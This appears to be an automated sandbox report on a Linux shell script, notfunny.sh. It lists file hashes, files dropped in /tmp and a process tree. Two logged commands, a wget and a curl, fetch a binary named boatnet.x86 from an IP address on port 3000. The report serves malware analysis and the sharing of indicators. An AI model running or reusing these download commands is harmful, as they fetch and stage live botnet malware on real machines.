Analysis
-
max time kernel
149s -
max time network
122s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 01:18
Static task
static1
Behavioral task
behavioral1
Sample
notfunny.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
notfunny.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
notfunny.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
notfunny.sh
-
Size
3KB
-
MD5
fc73d6be8e91e575c902e5d3b1834868
-
SHA1
61880a4da8b19dc7d4d87b5a3d55e0a992aac856
-
SHA256
9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
-
SHA512
1a2710fc7254ed255df6389118929be76e435a66e77f58b6065f2771e235295647a7f6f62e008fa3e2ac6bf0126abef05569dc76542a549b608bf94fd657a9a3
Malware Config
Signatures
-
resource yara_rule behavioral4/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl
Processes
-
/tmp/notfunny.sh/tmp/notfunny.sh1⤵PID:704
-
/usr/bin/wgetwget http://154.216.19.166:3000/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:708
-
-
/usr/bin/curlcurl -O http://154.216.19.166:3000/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD58833728bd41c20fb14e6075a9cdd8afc
SHA19733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA51258fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48